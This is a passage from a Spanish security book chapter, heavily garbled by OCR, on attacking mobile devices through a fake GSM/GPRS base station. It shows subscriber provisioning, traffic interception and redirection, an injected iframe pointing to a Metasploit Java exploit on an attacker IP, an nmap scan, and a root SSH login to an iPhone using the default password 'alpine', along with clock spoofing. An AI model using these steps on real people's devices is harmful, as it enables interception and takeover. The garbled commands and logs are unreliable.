Regislro  del  teriiimal/disposiüvo  víctima  (provísionamieüto  la  primera  vez) 

Para  que  mi  determinado  disposili%'0  inóvil  pueda  obtener  servicio  de  la  estación  base  falsa,  su  1^^1S1 
deberá  haber  sido  pro\isioiiado  en  el  MLR,  que  no  es  más  que  una  sencilla  base  de  datos  en  fomiato 
SQLileS,  contenida  en  un  único  fichero.  Aunque  podría  provisional  se  completamente  a  priori,  la 
manera  más  sencilla  de  realizar  la  provisión  es  la  siguienLc.  Primero,  inLcníar  una  vez,  antes  de 
realizar  la  provisión,  registrar  el  móvil  en  la  estación  base  falsa.  Esto  puede  hacerse  o  bien  emitiendo 
con  la  identidad  (MCC/MNC)  del  operador  real  del  nióciL  en  cuyo  caso  el  móvil  intentará  el  registro 
automáticamente  tras  un  cierto  tiempo,  o  bien  con  otra  identidad  (MCC/TviNC),  y  entonces  será 
necesario  forzai'  el  intento  de  registro  eligiendo  selección  manual  de!  operador  y  seleccionando  el 
ííperador  correspondiente  a  la  estación  base  falsa.  Ese  intento  de  registio  fallará,  ya  que  el  IMSl  no 
está  todavía  provisionado,  pero  OpeuHSC  habrá  registrado  el  intento  en  c!  HLR  y  Habrá  creado  la 
fila  adecuada  en  la  tabla  “subscriber”,  con  algunos  valores  por  defecto,  y,  lo  que  es  más  imporrnnte, 
con  el  campo  TMST  rcIlcTio.  A  contin nación,  editar  esa  fila  en  concreto,  cambiando  el  valor  de  la 
columna  '^aiithorized''  a  “Lb 
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roct01s.bgsmDO  :  sqlite3  /var/opt./openbsc/blr  .  sqLi"s3 

CQLi-e  versión  3.1.12  2C12  05  11  02:05:22 

H,  n  1 V;  r  .  'i  ft Tí  -y  Fo  r  i  n  p  I .  f  l , c:  I  i  c.i  ■  i 

Enter  SQL  sta“ement3  termir.atsd  with  a 

sqlive>  selecv  ^  from  eubseriber; 

1  2C  I  3-0  I  -0  [II  20 1  3-OT  -OS  L  J  I  2140  [-  Resto  de  IMSI  ocultado 
"] I [ñame] | |0  []  [] I [] 

aqliv.e>  'jpdate  subscriter  set  autherized=l  v^here  id=l  í 
^  ql  I  .e>  seT  eoi.  ^  r't.]i!i  .-u.  b.:5r.:i- j  ber. ; 

LI2C13-01-03  [: I2C13-01-03  []|2140["  Resto  de  IMSI  ocultado 
-]  I  [na-mel  I  fexv'  |1  [1  í!  I  [1 


Nota:  Para  facilimi  la  lectura  de  mensajes  de  /üg  posteriores,  se  recomienda  taiubiéu 
editar,  de  manera  análoga,  los  valores  de  Is.s  coluninas  '"ñame”  y ' 'extensión'' 


Una  vez  antnnVadü  el  TMSl  de  la  tarjeta  SIM  del  disp<5STtivo  nfióvil,  a  partir  de  ese  momento  todos 
los  intentos  de  registro  del  mismo,  ya  sean  manuales  o  automáticos,  tendrán  éxito,  y  el  dispositivo 
obtendrá  seivdcio  de  la  estación  base  falsa.  En  el  nigmento  del  registro,  si  este  es  aceptado,  y  sí 
se  han  tinhi litado  prcvianicnic  los  mensajes  relativos  a  Mobihfy  Management  (MM)  como  se  ha 
indicado  antes,  en  la  sesión  de  'l'EL.NE  T  conectada  a  OpenBSC  deberán  aparecer  mensajes  similares 
a  los  siguientes; 

<00C2>  gü:u_D4_3S.-_  :1C4S  LOCATION  UFDATIMG  REU'JESG :  r.LÍ_Lyi.]v=0x04  Midi}  Lypc^=IMSI 
ATlACll 

<00C2>  gain  34  G8.c:460  IDEKTITY  RE3PONSE:  jr.i  ti,pe=0x02  MI  (  [  ] ) 

<00C2>  í:i.:í:ti_34_:]£.c:424  ->  LOCATIDH  UPDATE  AECZPT 
<Cm3C2>  gs.Ti_34_aO,c:7GG  ->  MT-i  INFO 

<Ü0C2>  g5ni_3ub3criber  ,c :  353  Subscriber  ]?ho:nsl  ATEACHED  LAC=1 

<nnr2>  q.-ii_n4_ns.c  bl  G62  TM5I  Rf.'uliavaL.io-i  ComnloLvd.  Subu-viver :  lFhonc4-02U'-^lCE 

Y  en  la  sesión  de  l’ELNE'f  conectada  a  OsnioSGÜíN  deberán  aparecer  mensajes  similares  a  los 
siguientes; 

<ÜiJC2>  g|.:rLí_:ji[u:L.c:  64Ü  ->  GME4  ATTACH  RZQUEST  MI  í  [IMSI  ocult¿:.doU  type="GrRS  ¿-tdcli" 

<  n  0  C  2  >  gp  ]: í^_vmn  .  c :  3  5  3  <  -  ( ^  R  K  .5  A' I.  .1 'Ai J I-  A  [Tí  I  -  I  Cn  rví  R - '  ■  M S  -  (>  x 5  e 7  3  5  6 eb  ] 

<Ü0C2:>  gprs  gmr:L.c:1042  ->  ATTACH  COXPLETE 

Y  cii  el  uiomentü  el  disposíLivo  iriLentc  eofieclarse  a  luLemcL,  la  sesión  de  TELNET  coiieciada  a 
OsmoSGSN  deberán  aparecer  mensajes  similares  a  los  siguientes: 

<.0QC2>  gprs_gmri.  c:  1.13  9  ->  ACTIVA  I'E  PDF  COMTEXT  RIQ:  SAPI=1  lETF  I?v4 

í:OOCf>  sgsn  libg-p.c:12£  Create  PDF  Cen-sxt 

<F  D ll  r  >  fjíj ü'.j i_.l  lb[j  :p..  c :  3'f  G  libgt  p  cb_rjor]i  {  L  yj.: :j- 1  fe  j-  v-l 2  S  ^  rid_[i- 0x7  f  8 5dü c  1 5 3 4  3  ^ 

■r:  bp  -0x149  de  5  0 ) 

<--OOCf>  sgsA  lib5“p.c:265  Pecalved  CREATE  PEP  CTX  CO^TF.,  cause^l28  (Requast  accepted) 
<tiU13>  yi3ri;_^ndvp.fj:2  97  SM2M-ACTIVATE .  xnd  { _lij=Uxl43yy yO  TLL:=d.'j7ibfet:lj;  SAPI-3, 
VSAHi-li 

<:0032>  gprs  pmjr..c:ll37  <-  .ACTIVATE  PDF  CGMTEXT  ACK 
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Prueba  de  cüiiexian  a  Ijiternet  desde  el  dispusitivu  víetíma 


/  Una  forma  rápida  de  verificar  que  lodo  el  cntonio  esté  fmicionaTido  e  orre  clamen  te  para  cnriiLar 
tráfico  del  dispositivo  a  Imemet  y  viceversa,  es  abrir  el  navegador  en  el  dispositivo  móvil  e  inrentar 
navegar  a  cualquier  URL  conocida.  Por  ejemplo,  navegar  a  ''""htip ://wn^KGoogÍe,coryr  y  realizar  una 
búsqueda  de  un  término  cualquiera  (por  ejemplo  ^Taddorig”).  Si  las  páginaív  se  cargan  corree tani en lc^ 
tanto  la  de  introducción  de  la  biisqueda  como  la  de  resultados  de  la  búsqueda,  se  podrá  concluir  que 
el  entorno  está  emritado  el  tráñeo  IP  correctamente. 


Interceptación  de  comunicaciones  de  datos 

Hado  que  todo  el  tráfico  JF  del  cliente,  o  clientes,  GPRS  es  ennitado  \ia  el  equipo  de  manipulación, 
bastará  utilizar  en  este  equipo  nn  sniíTcr  de  red,  como  Wtreshark,  para  capturar  las  eoniunicac iones 
de  datos  de  los  dispositivos  móviles.  De  esta  manera,  todos  los  datos  qne  no  circulen  cifrados, 
podrán  ser  decodifícados  en  el  equipo  de  manipulación. 

Ejemplo:  Interceptación  de  comunicaciones  HTTF 

Si  desde  el  dispositivo  móvil  se  accede  por  HTTP  a  un  servidor  web,  la  infbmiacióii  intercambiada 
entre  el  dispositivo  y  el  servidor  viajará  en  claro,  y  su  contenido  podrá  ser  observado  en  el  equipo  de 
manipulación  sin  más  que  ejecutar  Wíreshoí^ky  filtrar  por  “http\ 


ínn^gEín  12.06;  Captura  ds  im;i  sesión  HTTP  sn  el  eqniixi  de  niíuiipuLidón. 


Por  ejemplo,  si  el  usuario  del  dispositivo  móvil  abre  su  navegador,  visita  la  página  del  buscador  de 
Gocfgie,  y  busca  un  término,  como  por  ejemplo  “patatá”,  en  el  Wiívshark  del  equipo  de  man  i  pul  ación 
se  podrá  observar  que  el  usuario  ha  visitado  esa  página,  y  cuál  ha  siílo  cl  término  que  ha  huseado 
en  ella. 
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Otros  ejemplos 

Pero  las  comunicaciones  HÍTP  del  navegador  no  son  las  imicíis  comunicaciones  no  cifradas 
ulil  izadas  liabilualmente  por  dispositivos  móviles. 

Para  empezar,  muchas  aplicaciones,  riistinüis  deí  navegador,  iiLilizari  HTTP  para  coiimoicaise  con 
SLts  servidores.  Por  ejemplo,  las  primeras  versiones^^  de  IVhatsapp  enviaban  todo  el  tráfico  en  claro, 
mediante  conexiones  HTTP. 

Pero  además,  p[>T  stipucsií»,  HTTP  no  os  cí  único  protocolo  de  corimiiícacióü  de  red  que  no  cifra 
los  datos:  DNS,  rüLWL  r,  ITT  o  SMiP  son  algnno^s  ejemplos.  Si  alguna  aplicación  o  scrvncio 
del  dispositivo  utiliza  algún  protocolo  no  cifrado,  la  infonnación  será  accesible  directamente  a  im 
atacan  Le  ctm  la  in  rracsLrucLura  desenLa. 

Redirección  y/o  alteración  de  comunicaciones  IP 

Dado  que  todo  el  tráfico  IP  del  cliente,  o  clieutes,  GPRS  es  enmtado  vía  el  equipo  de  manipulación, 
será  muy  sencillo  redirigir  y/o  alterar  las  eomurúcac iones  de  datos  de  los  dispositivos  móviles, 
utilizando,  por  ejemplo,  reglas  de  JFtables^ 

Ejemplo:  Explotación  de  una  vulnerabilidad  de  Java  de  un  PC  portátil 

SufXHigase,  por  ejemplo,  que  el  dispositivo  móvil  es  un  PC  portátil  con  sistema  operativo  ¡Vindows 
XP  SPS,  con  una  versión  de  Java  (IRE)  anterior  a  la  6.24  y  con  un  módein  2G/3G. 

Las  versiones  de  JRL  anteriores  a  la  6.24  tienen  una  vulnerabilidad  para  la  cual  existe  un  exploit 
disponible  en  MetaspioiP^  {Jm^a  codebase  trusT').  Para  explotar  la  vulnerabilidad  usando  este 
exploü,  es  necesario  que  el  navegador  del  PC  diente  navegue  hasta  una  URL  creada  por  Meíasplo tí ^ 
en  la  cual  este  quedará  escuchando.  Si  se  logia  que  el  navegador  solicite  el  contenido  de  esa  URL, 
Melasplok  responderá  al  navegador  enviándole  cierto  contenido  malicioso  que  hará  que  se  ejecute  en 
d  PC  víclírna  el  código  elegido  corno  por  ejemplo  establecer  una  sesión  de  Meierpreier, 

Desde  la  sesión  de  A4eterpreter,  se  dispondría  de  control  completo  sobre  el  PC  víctima. 

Para  que  d  navegador  del  PC  victima  solicite  esa  URL,  se  puede  aprovechar  la  situación  privilegiada 
de  la  máquina  de  rnani  pul  ación,  esperar  a  que  el  usuario  víctima  navegue  a  cualquier  página  web, 
y  entonces  inyectar  contenido  HTML  añadido  dentro  de  alguna  de  las  páginas  legi  timas  v ¡si indas, 
forzando  al  navegador  a  solicitar  la  URL  de  nuestro  interés,  pensando  que  forma  parte  de  una  de  las 
páginas  legítimas. 


2^  Aproxirnadamente  a  partir  de  acosté  de  2012,  MiaisApp  ciíra  sus  comunicaciones. 
26  corn/ 

2  7  h  fíp:/Av\vw.  meíasplo  fi.  com/modules/exphif/wfi'ido  w.i¡ 
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Suponiendo  que  el  t'ApIoii  de  MetcLsploíí  efiLuvicrfi  escuchando  en  el  puerto  SüSl  de  la  dirección 
192.168.200.33,  y  que  el  path  definido  para  el  expiolt  fuera  “/javaexploit”,  ei  código  HTML  a 
inyectar  podría  ser: 

< i f  sr G— '■^hhT-7:' :  /  /  t  97  -  1  68. 200. 3 ^  :  8 ü b  1  /  j ¿i vaexpl ^it >< /  i f  rame> 

H1  detalle  de  la  coníigLiración  concreta  para  realizar  esa  inyección  de  contenido  HTN^ÍL  queda  rucra 
del  alcance  de  este  libro,  pero  al  lector  no  le  será  difícil  encontrar  en  la  red  información  sobre 
cómo  hacerlo.  Podría  utilizarse,  por  ejemplo,  .IPtables,  para  redirigir  el  tráfico  web  a  una  instancia 
de  squiiP^,  proxy  configurado  como  proxy  transparente,  combinado  con  un  senddor  TCAP  coniíj 
c-icap^"^,  para  realizai^  la  inyección  propiaineiite  dicha. 


Imagen  12.07:  Video:  í9vv.n/fí;í  ¿í/'C  vía  GPRSj'Edgn 


En  la  sigoiente  URL  se  puede  ver  un  vídeo  mostrando  este  ataque  paso  a  paso:  hnp:/AvHr^\^youtiíbe. 
com/waích  ?v=FXNDhcIIÍjfcs 

Y  el  mismo  video  está  también  disponible  para  su  descarga  en:  hl(p:/Á\^'w.íadcIong.cüm 
h  im  l  #  Vid&aOwtmngPCvia  GPRS 


2í^  htíf7:/Á\  \vw.  sq7ArrJ-ríjf  hi\of^/ 

29  Enp://c~¡cap.  sourcejorge.^ise 
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Otros  ejemplos 

Obviamente,  la  re  dirección  de  tráfico  puede  ser  útil  píam  un  atacante  cu  tiiúl  tiples  escenarios.  Por 
ejemplo,  puede  redkigii’  las  peticiones  DNS  a  un  se^dor  bajo  su  control,  que  para  determinados 
nombres  devuelva  traduceiones  falsas.  De  becliOj  la  íiifraestmctura  descrita  ya  permite  eso  sin  más 
que  introducir  las  traducciones  falsas  en  el  fichero  /etc/hasts  del  equipo  de  ruanij>ülac¡óa,  porque  de 
allí  las  leerá  cinsmasq,  que  es  el  servicio  declarado  como  servidor  DNS  de  los  cliemes  GPRS, 

lambién  puede  re  dirigir  conexiones  web  a  servidores  web  falsos^  donde  se  le  solicite  mformación 
personal  ai  usuario  (por  ejemplo,  contenido  de  su  tarjeta  de  ecurdenadas  para  opetaciones  bancarias). 
o  donde  cierto  contenido  malicioso  intente  aprovechar  alguna  vulnerabiliílad  de  la  aplicación  diente 
que  está  navegando,  y  así  lomar  control  de!  equipo. 

Para  conexiones  como  fP.  en  las  que  no  se  produce  una  autenticación  del  servidor,  el  resultado 
es  indistinguible  del  servidor  real  para  el  usuario,  Pero  incluso  para  conexiones  donde  sí  se  debe 
producir  esa  antenlicación,  comtv  es  el  ctLSo  de  HTTPS,  la  redirección  puede  acabar  pasando 
inadvertida  al  usuario  si  este  no  entiende  bien  el  funcionamiento  de  los  certificados  SSL  y  acaba 
aceptando  conectarse  a  un  seividor  cuya  identidad  no  ha  podido  ser  verificada. 

í  .a  redireeción  de  Ixáfieo  es  trivial  de  realizar,  utilizando  IFtabies,  como  se  ha  descrito  anteriormente 

Además,  aparte  de  redirigir  el  tráfico,  iin  atacante  podiía  manipular  el  contenido  del  mismo.  Existen 
multitud  de  heiTami entas  que  permiten  manipular  distintos  tipos  tic  tráfico.  Por  ejemplo,  usando 
squid  como  proxy  hans párente  se  podría  usar  un  plugin  que  permitiera  inyectar  determinado 
contenido  en  ciertas  páginas  web,  de  mxjdo  que  el  cliente  recibiría  ese  contenido  insertado  junto  con 
el  contenido  legítimo,  y  a  todos  los  efectos  proveniente  dcl  servidor  legítimo.  Ese  código  HTML 
inyectado  podría  ser  cualquier  clase  de  contenido  malicioso- 


Ataque  directo  vía  TP 

Los  ataques  descritos  en  los  apartados  anteriores  se  centran  en  la  observ^acióo  o  manipnl ación  de 
las  comiinic aciones  iniciadas  por  el  dispositivo  móvil.  Pero  también  son  posibles  ataques  dhectos 
contra  la  dirección  IP  del  dispositivo  móvil:  la  dirección  Í  P  es  conocida  por  el  atacante,  porque  se  la 
asigna  él  (medíante  la  configuración  del  üüSN),  y  es  accesible  directamente,  es  decir,  sin  fircwalls 
de  red  intennedios,  desde  el  equipo  de  manipulación. 

Así,  desde  el  equipo  de  manipulación,  se  puede  lanzar,  por  ejemplo,  un  es  caneo  completo  de  todos 
los  puertos  TCP  y  UDP  del  dispositivo,  intentando  encontrar  servicios  ac:Hvo.s  y  accesibles  desde 
el  exterior.  Si  alguno  de  esos  servicios  accesibles  presentara  alguna  vulnerabilidad,  se  tendría  un 
camino  para  tomar  control  remoto  del  dispositivo  móvil. 


Ejemplo;  Esc  anco  de  puertos  contra  uu  teléfono  móvil 

La  siguiente  figura  muestra  un  escanco  de  la  lista  de  puertos  por  dcfcclo  de  Nmap^  ejecutado  cojitra 
un  iPhone  4  con  iOS  ^.3  J  , 
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rooz^laijgsmOü  nmap  -n  -^o'-pn  H) .  )  .‘:í .  í  .i .  / 

3 1  a  r  t  ing  ílnap  íí .  0  Q  {  |- 1 1  p  :  /  /  íli  i  .Lip .  ijxg  (  ah  íl  CE  T 
Njr,E.p  sean  report  for  10.E3.13.2 
Kom.  .  i. a  üii  0J  .4  /:r  lateney)  , 

He  t  s  h.ovj  r. ;  993  r.  1  o  s  ed  pci  l  L  ¡j 
PCRT  GrATE  SERVICE 

2 '?  /  L  I.'  £  ^  c  £  n  s  3  h 

G2C73/t:í:p  epí^'n  7  P^one-aviiiL; 

Nrii,:]()  oon::  :  1  IP  addreas  (1  hpst  up)  scaaned  tu  71,15  secondE 

roC't^laby&fr.CO:  -4 _ ^ _ _ 

fniñger:  1E.0S:  Eeciituíu  di  puertos  por  defecto  de  Nmap,  contra  de  un  iPhoáÉ  4  con  iOS  7.  ]  /. 

Obsérvese  que  además  del  pueito  62078/Lcp,  dedicado  al  servicio  de  sincronización,  el  iPhonc  tiene 

tambiéji  abietlo  d  puerto  22/tcp,  correspondiente  a  SSH,  listo  indica  que  el  teléfono  tiene  hecho  d 
JaUbre.ak,  ya  que  Apple  no  permite  la  instalación  de  un  servidor  SSH. 

Si  quien  hiciera  éí  JaUbreak  en  su  inoineriLo  no  Luiiió  k  precaución  de  cambiar  la  contraseña  de 
tx>ot,  se  podi  ía  entrar  en  d  dispositivo  utilÍ7an(1o  la  que  hay  por  defecto,  que  es  “alpiné".  En  este 
caso,  creoLivamente,  se  lograría  entrar  con  dichas  credenciales  por  defecto,  como  so  rtiuosLra  on  la 
siguiente  figura. 

rcE't:'91í3.bgñjr.On  : -If  p-.r.h  root@  IC  .  11 . 11 . 2 

The  üsrit icity  of  hosn  'lC.ll.il. 2  (10.-11.13.2)''  caí:' t  be  e^tablished. 

RSA  k-y  I_!igL'rprii;-  is  45  :  cd :  £'3  :  f  1  :b 9  : 1 S  :  39  :  2c  íbG  :  ed :  IG  :  3=  :  ñ  1  :  9^  ;T:i5  :  C.3  . 

Are  yetj  Eore  yoi]  wíírr.  lo  continué  conne:!'ting  (yes /no)  ?  yes 

í¡’?ai:riir.g :  Permáner.til^r  added  '10.13.13.2'  r.o  L  tío  _l¡jt  of  kno^'n  hosts. 

n oc  t, @ ■  0  . 3 . 1 3 . 2 '  E  p us s tTOr d :  [alpina ] 

1  Ph  on  e- de  -  A'dm  i  r.i  é  t.  r  d  o  n  :  -  re  o.  ^  u:  i  Linio  -  a 

Dar-ssrin  iPhcp.e  de  Administrador  ll.t..D  Uarwin  Kernel  Vorulon  ll.U.Ü:  The  Feb  10 

2  1  :  5 :  5  ^  2  C 1 1 ;  roo  t  ’  jcnu  - 1 7  3  5 . 4  6  -  2  /  RELEASE  _ARM_3  5L  3  9  3  CX  i  Ph  nn  e3 ,  '  a  r  m  X  9  OAP 

Da^;^fic 

iPAcine-de-Acjministrador  í-  rcot^-lcí  -1=  / 
total  14 


drvíKr  víxr- 1 

15 

r  oüt. 

,^dni '  n 

743 

Jan 

16 

C4:Ü2 

drvjxrvíxr  t 

15 

roct 

admin 

743 

Jan 

IG 

C4:02 

"1 

L  Lío  L 

udinin 

D 

Eeb 

m 

2011 

-file 

/ 

drwxr-íír-x 

3S 

roct 

■|  3£ 

Jan 

18 

2U12 

Applications 

drvíxrvjxr  x 

n 

root 

ádrale 

ü  3 

Í4ar 

IB 

2011 

drvísír-a::  -K 

24 

JL  uoL 

víheel 

340 

May 

13 

2012 

Library 

drwxr-xr-x 

G 

L'OOt 

wheel 

■|  02 

Muy 

IC 

2Ü12 

SyatejT: 

Irwxr  xr  x 

1 

root 

a'Cmix 

11 

Jar 

IG 

04  :  C2 

User  ->  /vai/idcbllc 

drwx 1 -xx“x 

2 

root 

vjheel 

2CÜ5 

May 

13 

2012 

bin 

drwxr-xr-2i 

2 

root. 

v/h  e.e ' 

20  4 

May 

11 

2012 

boot 

drwxrwxr  t 

2 

root 

adiQin 

G3 

feo. 

7 

2  0  ■  1 

cores 

dr-xr^xr-x 

3 

rüot 

víheei 

1634 

Jan 

16 

04  :  31 

dev 

Irwxr-xr-x 

1 

rnot 

w  n  e.e  1 

12 

Muy 

11 

2012 

etc  ->  priva te /etc/ 

drwxr--xr-x 

2 

root 

wheel 

GB 

Jet 

2  3 

203G 

1  ib 

d  r  tirxji  “xr-x 

2 

root 

wheel 

68 

Oct 

23 

2006 

jr.r*c 

Imagen  12.09r  Entrando  por  55H  en  un  iPhorfi'  coiiJailbruíÁ  íietljo,  i!lili:¿afido  la  contraseña  por  dcfccio  de  mOL  (Rartc  1). 
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drwxr-xr  x 

4  roct 

í-íheel 

13S  Api- 

1 1 

2011 

priv=~e 

drt-Mxr-xr^x 

2  rorjt 

ñ May 

13 

2012 

abiu 

1 rwxr-xr-x 

1 

whsel 

16  May 

13 

2Ü12 

liEip  fJ!  ..  v; a  r fí /  va  r / hrn.p / 

drí-/xr  xr  x 

ID  ZQO- 

whsel 

314  May 

■|  n 

2012 

asr 

Irwxr-xr-x 

1  roo’_ 

A-dir-iniis-:: 

w'-iet=tl 

rador :  ■“ 

12  May 
root^ 

13 

2012 

var  >  prívate /vai/ 

Imagen  12.09:  Entrando  por  SísH  en  un  oun  JíTí^jf^njÁ  lieclm,,  utilizando  la  contraseña  por  detecto  de  yoct  (Parte  2). 

Si  nn  sl:  hubiém  encontrado  el  servicio  SSH  con  la  contraseña  por  defecto,  se  podría  intentar  buscar 
una  viiinerabilidad  en  cualquier  otro  servicio  que  estuviera  abierto,  como  por  ejemplo  el  servido  de 
sincronización,  que  escucha  en  el  puerto  62078/tep.  %i  se  hiciera  un  escaiieo  completo  de  todos  los 
puertos,  quizás  se  encontrarían  más  servicios  abienos,  los  cuales  se  podrían  atacar. 


Otros  ejemplos 

Obviamente  el  escaneo  de  puertos  y  el  consiguiente  ataque  a  los  servicios  que  ofrezca  el  disposióví> 
móvil,  es  aplicable  a  cualquier  tipo  de  dispositivt),  tanto  si  se  Uata  de  un  teléfono,  como  si  se  trata 
de  una  tableta  ü  incluso  de  uti  PC  conectado  mediante  modem  3G.  Fn  d  caso  de  que  el  dispositivo 
víctima  sea  un  PC  (conectatlt’i  mediante  niodem  3ü)  es  más  probable  qué  éste  tenga  i  tal  ado  y 
configurado  un  firewaH  que  prohíba  las  conexiones  en  trun  Les,  impidiendo  el  acceso  desde  el  exterior 
a  sus  servidos.  No  obstante,  no  es  extraño  encontrarse  con  PCs  en  los  que  d  usuario  ha  deshabilitado 
^■Ifire^vüII,  o  este  ha  sido  configurado  pennítieiido  el  acceso  a  determinados  servicios,  como  d  de 
coinpartición  de  carpetas.  Por  tanto,  muchas  vetees  vale  la  pena  [irobar  incluso  en  este  caso. 


Ataques  a  dispositivos  especiales 

Hasta  ahora  el  capítulo  ha  estadí>  eentrado  en  los  dispositivos  móviles  más  comunes,  como  pueden 
ser  teléfonos,  tabletas  y  PCs,  pero  hay  muchos  oirtjs  disjjositivos  qye  también  utilizan  la  cobertura 
OFRS/Edge,  y  todos  los  ataques  descritos  podrían  ser  lanzados  también  contra  cualquiera  de  esos 
dispositivos. 

Ejeniplo:  Ataque  a  un  ronter  3G 

Hoy  en  día  niuchas  pequeñas  oficinas  de  muy  variada  índole  (y  también  doniicilios  particulares), 
se  conectan  a  InlerneL  a  través  de  un  router  3G.  Un  atacante  que  lograra  dar  coherLura  a  ese  router 
utilizando  una  estación  base  falsa,  como  se  ha  descrito  antes,  comprometería  todas  las  comunicaciones 
no  cifradas  que  se  produjei'an  entre  cualquiera  de  los  disposiLivos  de  la  oficina  e  Internet. 

Lo  único  contra  lo  que  los  dispositivos  de  dentro  de  la  oficina  estarían  probablemente  protegidos, 
sería  contra  el  ataque  directo  vía  ÍP,  pues  Lo  que  probablemente  el  router  ocultará  las  direcciones 
TP  de  los  equipos  interiores  haciendo  N  AT.  E!  ataque  direeUí  vía  IP  se  podría  lanzar  solo  contra  ei 
propio  roLiLer,  lo  cual  no  deja  de  ser  interesante  para  un  atacante,  porque  triuehcís  rouieis  son  dejados 
con  configuraciones  por  defecto  que  ofreccíi  se  nucios  poco  protegidos. 


f 

i 


I 


Imagen  12 JO:  El  ataq^je  a  un  ?-oiáíí^r  30  tiüijipraiiidltí  las  cuniunkci^: iones  de  ios  cüspositivüs  que  hay  detrás  de  él 


Otros  ejemplos 

Aparte  de  los  ya  comcntHcios,  hay  muchos  otros  tipos  de  dispositivos  que  utilizan  GPRS/Edge  para 
sus  Gomimicaciones,  como  por  ejemplo: 

-  Rastreadores  GPS* 

-  Datáfoiios  de  tarjetas  de  crédito  (rambién  í jamados  TPV,  Terminales  de  Punto  de  Venta), 

-  Cámaras  de  vigilancia. 

-  Estaciones  meteorológicas, 

-  Dispositivos  de  control  (SCADA), 
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Todos  estos  dispositivos  también  son  susceptibles  de  seríil^ieíidos  como  hc  hm  descrilo  ajiteriomieiite, 
y  1  iu  lien  Lable  mente,  en  inuclias  ocasiones  ^  imichos  de  ellos  no  han  sido  protegidos  con  ven  i  en  te  mente. 


5.  Manipulación  de  fecha  y  hora 

El  estándar  GSM  ofi^ce  la  posibilidad  de  que  las  estaciones  base  mclnyan  información  de 
sincronización  de  fecha  y  hurd.  en  la  señal  de  broadeetsíj  que  los  mó\4ies  pueden  utilizar  para 
sincronizar  su  propio  reloj  y  calendario.  I  a  mayoría  de  los  dispositivos  móviles  ofrecen  al  usuario  la 
posibilidad  de  sincronizar  automáticamente  el  reloj  interno  con  esta  información  de  hmadeasi  de  las 
estaciones  base,  de  modo  que  el  dispositivo  siempre  tenga  la  fecha  y  hora  correctas  del  lugar  donde 
se  encuentra.  Por  ejemplo,  en  un  tFhofie  se  puede  encontrar  esta  opción  dentro  del  mcíiá  Ajustes 
->  General  '>  Fecha  y  Hora,  y  la  opción  se  llama  ''Ajuste  automático’";  y  en  un  teléfono  Android  es 
posible  encontrar  esta  opción  dentro  dc1  menú  Confíguracioii  ->  Fecha  y  hora,  y  la  opción  se  llama 
'Techa  y  hora  automáticas’f 

La  gran  mayoría  de  los  usuarios  tienen  activada  esta  opción.  Fn  muchos  casos  simplemcnLc  porque 
es  la  opción  qiEc  viene  configurada  por  defecto  (en  la  inayoria  de  teniiinatesh  y  otros  porque  el 
usuario  opta  por  ella  por  comodidad.  Sea  por  el  inntiví)  que  sea.  si  un  usuario  Lieiie  activa  esta  opción 
cii  su  dispositivo  móvil,  es  vuhiemble  a  un  ataque  remoro  de  modiñcación  de  fecha  y  hom.  rcali/ado 
utilizando  una  estación  base  falsa. 

ínfraesínictura  necesaria 

Para  realizar  esta  manipulación  remota,  un  atacante  puede  utilizar  la  misíiia  üilTaestnactuin  basada 
en  OpenBSC  ya  descrita  anteriormente. 

Procedimiento  de  ataque 

El  proccílimicnLí.j  a  seguir  para  realizar  el  ataque  es  muy  sencillo;  lo  Único  que  hay  que  hacer  es 
configuran  antes  de  conienzar  a  dar  cobeitura  con  la  estación  base  falsa,  el  sistema  operativo  dd 
equi|>íi  OpenBSC  para  que  su  fcclia  y  hora  seaji  en  las  deseadas  para  el  móvil;  y  a  continuación, 
simpiemenre  dar  cobertura  al  móvil  víctima  con  lacslación  base  fiilsa. 

Resultad  u  del  a  tuque 

Cuando  el  dispositivo  detecta  un  cambio  de  Location  Area,  si  está  configurado  para  ajustar  la  fecha  y 
hora  de  forma  anUimática,  reajustaiá  su  reloj  y  calendario  para  hacerlo  coincidir  con  la  infonnación 
emitida  por  la  celda.  Por  tanto,  a  los  pocos  segundos  de  haber  aceptado  la  cobeitura  de  la  estación 
base  falsa,  el  dispositivo  habrá  asumido  la  fecha  y  hora  emitidas  por  la  estación. 

Esto  se  puede  utilizar  lanío  para  hacer  saltos  al  futum  como  al  pasado.  Dependiendo  del  dispositivo, 
el  imigo  de  fachas  a  las  que  se  podrá  saltar  puede  ser  dístiiiLo.  Por  ejemplo,  eii  algunos  dispositivos 
no  es  posible  establecer  una  fecha  anterior  al  1  de  enero  de  2000, 
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Ejemplo:  cambio  de  fecha  y  hora  de  un  iPhonc  y  uti  Android 

Las  aiguicTitüK  figuráis  mueRtran  un  par  de  ejemplos  de  realización  de  este  ataque,  primeiQ  contia  un 
iPhone  y  después  contra  un  dispositivo /Ifít/raíV. 

En  ambos  casos,  la  iéclm  de  los  dispositivos  antes  de  realizar  el  ataque  era  alrededor  del  mediodía 
del  20  de  enero  de  20 1  y  la  fecha  elegida  para  los  móviles  tras  el  ataque  es  la  mañana  del  1 3  de  abril 
fle2D¡  l.demodoqneel  usuario  víctima  disponga  de  un  día  conipleto  para  salvar  a  la  humanidad-^^. 


Antes 
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liiiageii  12. 12:  Cambio  de  fecliay  hora  dfc?  un  dispoüiüvo  iFhorre. 


Antes  Después 


Imagen  1  2. 1  jl:  Cambio  de  fecha  y  hora  do  i-u  diypu&iilivu  Ayi¿ír(jki 


3U  Ei  SI  áteme,  de  dcícusa  antimisiles  se  activó  el  19  de  abril  de  2í>ll ,  y  dos  diaí-  déspiuéa  deefara  b  guerra  a  la 

liujn anidad  y  desencadeiió  im  apaciiiiptüs  audear.  Las  crónica!^  de  Saralí  Comwr,  200?. 
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Positiles  usos 

La  utilidad  para  el  atacante  de  este  tipo  de  ataque  puede  ir  desde  hacer  que  el  Uíiuario  del  dispositivo 
móvil  víctima  llegue  Larde  a  una  rcumón.  hasta  posibilitar  la  realización  de  oíros  ataques  que 
dependan  de  ia  variable  tiempo,  como  por  ejemplt}  el  acceso  a  las  fotos  almacenadas  previamente  en 
un  disp<jsÍLÍvo  que  ha  sido  bloqueado,  como  se  describe  en  el  aparrado  ''Accediendo  a  las  fotos  de  un 
íFho?7e  con  /O.S' 5.  A"' cambiando  1a  fedia^*,  pertenecí  ente  al  capitulo  ''"iPhoíie  Local  Tricks  \ 


6.  Ataque  de  denegación  de  servicio 

Existen  varios  métodos  para  realizar  ataques  de  denegación  de  ser\ñcio  contra  terminales  móviles, 
de  ios  cuales  en  este  apartado  se  detallará  cómo  realizar  2  de  ellos  que  pueden  llevarse  a  término 
